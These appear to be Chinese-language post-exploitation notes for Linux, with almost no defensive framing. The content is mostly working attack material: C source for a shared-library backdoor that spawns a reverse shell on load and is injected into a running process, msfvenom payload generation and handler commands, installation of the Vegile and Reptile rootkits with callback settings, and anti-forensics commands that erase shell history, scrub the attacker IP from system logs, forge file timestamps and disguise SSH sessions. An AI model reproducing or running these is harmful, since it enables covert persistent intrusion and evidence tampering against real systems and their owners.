// 移除有问题的hide_process函数,专注于核心功能
// 反向shell主函数
static void reverse_shell() {
int sockfd;
struct sockaddr_in attacker_addr;
// 设置攻击者IP和端口(修改为你的实际IP)
attacker_addr.sin_family = AF_INET;
attacker_addr.sin_port = htons(4444); // 攻击者监听端口
attacker_addr.sin_addr.s_addr = inet_addr("127.0.0.1"); // 先用本地测试,成功后改为你的IP
// 创建socket
sockfd = socket(AF_INET, SOCK_STREAM, 0);
if (sockfd < 0) {
perror("socket创建失败");
return;
}
// 尝试连接
printf("[*] 尝试连接到攻击者...\n");
if (connect(sockfd, (struct sockaddr*)&attacker_addr, sizeof(attacker_addr)) < 0) {
perror("连接失败");
close(sockfd);
return;
}
printf("[+] 连接成功!\n");
// 重定向标准输入输出错误到socket
dup2(sockfd, 0); // stdin
dup2(sockfd, 1); // stdout
dup2(sockfd, 2); // stderr
// 执行shell
char *shell = "/bin/sh";
char *args[] = {shell, "-i", NULL};
execve(shell, args, NULL);
// 如果execve失败
perror("execve失败");
close(sockfd);
}
// 库加载时自动执行
__attribute__((constructor)) void backdoor_entry() {
printf("[*] 后门已加载,PID: %d\n", getpid());
// 创建子进程执行反向shell
pid_t pid = fork();
if (pid == 0) {
// 子进程
reverse_shell();
exit(0); // 如果reverse_shell返回,则退出子进程
} else if (pid > 0) {
// 父进程继续正常执行
printf("[*] 创建子进程PID: %d执行反向shell\n", pid);
} else {
perror("fork失败");
}
}
gcc -shared -fPIC -o reverse.so reverse.c -nostartfiles
创建一个进程并注入
sleep 3600
#开启另一个会话
pgrep sleep
#或 ps aux | sleep
./inject -p 24320 ./reverse.so
Vegile
生成
msfvenom -a x64 --platform linux -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.30.169 LPORT=4449 -b "\x00" -e x64/xor -i 3 -f elf -o backdoor.elf
上传并添加权限
chmod +x backdoor.elf
监听
msfconsole -qx 'use exploit/multi/handler;set payload linux/x64/shell/reverse_tcp;set LHOST 192.168.30.169;set LPORT 4449;run'
apt install gcc
git clone https://github.com/screetsec/Vegile.git
chmod +x Vegile
./Vegile --i backdoor.elf
chmod +x /usr/bin/screetsec /usr/bin/debug /usr/bin/tracker /usr/bin/supervisited /usr/bin/rma
./Vegile --u backdoor.elf
Reptile
环境
apt install -y gcc g++ make vim unzip
apt-get -y install linux-headers-$(uname -r)
服务端
./setup.sh install
#安装过程会有如下选项:
#Hide name (will be used to hide dirs/files) (default: reptile): 会被隐藏的文件或文件名
#Auth token to magic packets (default: hax0r):连接后门时的认证
#tokenBackdoor password (default: s3cr3t):后门密码
#Tag name that hide file contents (default: reptile):标签名,在该标签中的内容都会被隐藏
#Source port of magic packets (default: 666): 源端口默认
#Would you like to config reverse shell each X time? (y/n) (default: n): 是否每隔一段时间弹 shell (如果选择了n,就直接进行安装,不会显示下面的选项)
#Reverse IP : 控制端ip
#Reverse Port: 控制端端口
#would you like to config reverse shell each x time(default:1800) :每隔x时间回连一次
Token: hax0r
Backdoor password: s3cr3t
SRC port: 666
如果忘记了设置定时任务
/reptile/reptile_reverse -t 192.168.30.169 -p 8883 -s root -r 1800
客户端(控制端)
./setup.sh client
cd bin
./client
show
#LHOST Local host to receive the shell
#LPORT Local port to receive the shell
#SRCHOST Source host on magic packets (spoof)
#SRCPORT Source port on magic packets (only for TCP/UDP)
#RHOST Remote host
#RPORT Remote port (only for TCP/UDP)
#PROT Protocol to send magic packet (ICMP/TCP/UDP)
#PASS Backdoor password (optional)
#TOKEN Token to trigger the shell
#为空的选项都要设置
set lhost 192.168.30.169
set lport 8883
set rhost 192.168.30.172
set rport 8883
set pass s3cr3t
set token hax0r
set srchost 192.168.30.169
set srcport 666
set prot tcp
run
痕迹清除
历史命令清除
登陆后不记录历史命令
HISTFILE=/dev/null HISTSIZE=0 HISTFILESIZE=0; set +o history; history -c
在登录和退出时查看时间
date
日志历史记录
cat -n /root/.bash_history
#删除第101行以及之后的命令
sed -i '101,$d' /root/.bash_history
#其他用户同理
系统日志
ls -la /var/log
/var/log/btmp 记录所有登录失败信息,使用lastb命令查看
/var/log/lastlog 记录系统中所有用户最后一次登录时间的日志,使用lastlog命令查看
/var/log/wtmp 记录所有用户的登录、注销信息,使用last命令查看
/var/log/utmp 记录当前已经登录的用户信息,使用w,who,users等命令查看
/var/log/secure 记录与安全相关的日志信息
/var/log/message 记录系统启动后的信息和错误日志
#删除包含192.168.30.169的行
cd /var/log
sed -i '/192\.168\.30\.169/d' auth.log* *tmp syslog* lastlog /run/utmp apache2/access.log
touch -d "2025-12-10 06:24:39.067830158" *tmp syslog* lastlog auth.log* /run/utmp /var/log/apache2/access.log
#删除特定时间段的行 Dec 20 04:34:43 ~ Dec 20 04:59:54
sed -i '/^Dec 20 04:34:43/,/^Dec 20 04:59:54/d' auth.log*
隐藏远程SSH登录记录
连接目标时
#不记录ssh公钥在本地.ssh目录中
ssh -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" -o "GlobalKnownHostsFile=/dev/null" -T user@host "exec -a [kworker/u:0] bash -i"
